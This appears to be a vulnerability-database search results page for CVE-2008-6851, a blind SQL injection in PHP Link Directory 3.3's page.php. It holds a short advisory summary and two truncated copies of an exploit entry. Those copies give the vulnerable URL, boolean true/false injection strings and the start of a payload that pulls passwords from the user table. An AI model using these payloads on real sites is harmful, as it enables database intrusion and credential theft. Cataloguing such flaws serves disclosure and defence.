3 matches found
CVE-2008-6851
CVE-2008-6851 is a SQL injection in PHP Link Directory (phpLD) 3.3, specifically in page.php. The root cause is the combination of register_globals being enabled and magic_quotes_gpc disabled, allowing remote attackers to inject SQL via the name parameter. Connected sources confirm the affected c...
PHPLD 3.3 - Blind SQL Injection
phpLD 3.3 Blind SQL Injection http://www.phplinkdirectory.com/ magicquotesgpc = Off registerglobals = On Vulnerable: GET http://site/phpld/page.php?name= True Request: validpagename' or 1=1 False Request: validpagename' or 1=0 Try this urlencode: validpagename' or ORDMIDSELECT PASSWORD FROM PLDUS...
PHPLD 3.3 - Blind SQL Injection
PHPLD 3.3 - Blind SQL Injection phpLD 3.3 Blind SQL Injection http://www.phplinkdirectory.com/ magicquotesgpc = Off registerglobals = On Vulnerable: GET http://site/phpld/page.php?name= True Request: validpagename' or 1=1 False Request: validpagename' or 1=0 Try this urlencode: validpagename' or...